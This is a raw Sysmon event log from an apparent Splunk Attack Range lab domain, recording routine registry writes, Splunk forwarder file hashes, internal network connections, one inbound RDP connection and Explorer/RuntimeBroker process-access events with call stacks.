07:53:59.628{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f3-0x12588cfc) 13241300x80000000000000001049428Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 
07:53:59.628{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fb-0x741cf4fc) 23542300x80000000000000001049427Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:59.166{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67ADF5C47A4A827551D5B17901711B4A,SHA256=8E3D78DA5C461E9B58523083A7CA26D526E2BDD56C6D25F0A7BD9165F4B4C5CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807866Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:00.969{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4117584B0689AB6A4305AEAFC822FDD5,SHA256=5DFE4985E68D8A25FBA618A728D0312F7C61865462DB7D40FCDBE149B117A880,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807865Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:00.969{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=074647A239F519326447456083E7D307,SHA256=5121C6F3CEEFDAFD74C546AC049DD66C1140BA95F82D7AA7217F9C78F01AE2C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807864Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:00.812{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71341299240D4E723F31D3B7BD57D460,SHA256=B0961FA277C087888E88E39099A220964CE6C5FD7575F43A0FA5F9DCE8539226,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049440Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:00.832{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_075353MD5=CAB9EA099F8B65DA4AE125101D7328BE,SHA256=3E24E39A8813F2AC2140FD652407894FD0893262E99BBB6069BCAA3D59DC9B0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049439Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:00.182{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CF9223815139B93B2512B12245ECBE7,SHA256=5B13934346419A21CBCA6E7D28CF9C585E228E6F26256D3B51A3EC0EC5711CC4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049438Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:51.638{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51050-false10.0.1.12-8000- 23542300x8000000000000000807868Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:01.828{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=923E9F5EE463136501308D4AFCCC8B1F,SHA256=F0D2E7037AE362806F6ECA44BF00234F5D899EFCE3AA3A4B02FF117CD917C257,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049441Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:01.233{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1F3E419B67D0DEEF369FE1B4821AF95,SHA256=391CEA62044C5A1A0E16B651E782A22F082840AD9117C9A8F7A53E4F426F243D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807867Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:59.790{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-58305-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000807870Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:02.844{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3045948F9DC41786F7E8E90E6515EC71,SHA256=D91B95116593641B5C509D63A31B648EF6540D0EA596DD2B869EC7A6FF30D61F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049443Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:02.249{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=419306AB231343F293C0B0028626B93B,SHA256=5970A452CE965899B1D04467769666140D90B84BBBC8872081A2747BDE333502,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807869Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:00.100{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57287-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 354300x80000000000000001049442Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:53.492{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57287-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x8000000000000000807871Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:03.859{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A42FB247DECA32322B1A475412144855,SHA256=95A63018725DFA3323003DEAB629570556DA1FB20DEBF7B457D4B6F9CA039A0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049444Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:03.280{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C3A92CFA0CF8F32CA63BF6EA2296617,SHA256=28580EACAC91C19F91B881FDFB751F179ED39F3F8C568F85B279087C1EBAA40B,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000807873Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:04.875{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBEF6C1E39898F8645FD260EE19944B4,SHA256=D5CC576FBB14EC689AC212B02CA8CC30BEEB26662A685853A31ADBD33F7CAA58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049445Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:04.281{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD5ED2ACAB292A97B0342D549F5D3E6B,SHA256=79A9561CE21927137530DADB69F0D9C43D3A6C3724A74DE0510E6A8A9C85360A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807872Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:03.242{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57288-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807874Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:05.891{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=407B05FA1846E4300849F09BCA9374F1,SHA256=AFBAA5E99593134E87BE5BB8BCB26AE3C832B72498CA55D2E9A1F18659AF83CB,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001049447Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:05.312{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31EBF719F7958F7D956823BAF2F8AEAA,SHA256=DCFF1B4C041125090B7FEDD9AF2709BF983433E3F457B453ECA93BAE3CCB9380,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049446Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:56.768{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51051-false10.0.1.12-8000- 23542300x8000000000000000807875Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:06.891{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B5B8124AAEB8FE5D2C7ABE4684FC90A,SHA256=22271B99D97DCAD0CBD5BBA8E08B7960A540C6464B86B777A0931583E1BE78CB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049484Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:06.749{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001049483Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:06.749{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001049482Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:06.733{466BC892-32D3-60E8-770B-00000000CF01}63565180C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049481Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.733{466BC892-32D3-60E8-770B-00000000CF01}63565180C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049480Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:06.711{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049479Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.711{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049478Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:06.696{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049477Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.680{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\execmodelclient.dll+8e62|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 
10341000x80000000000000001049476Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.680{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\execmodelclient.dll+8d5e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001049475Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:06.665{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001049474Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:06.665{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001049473Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:06.649{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001049472Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
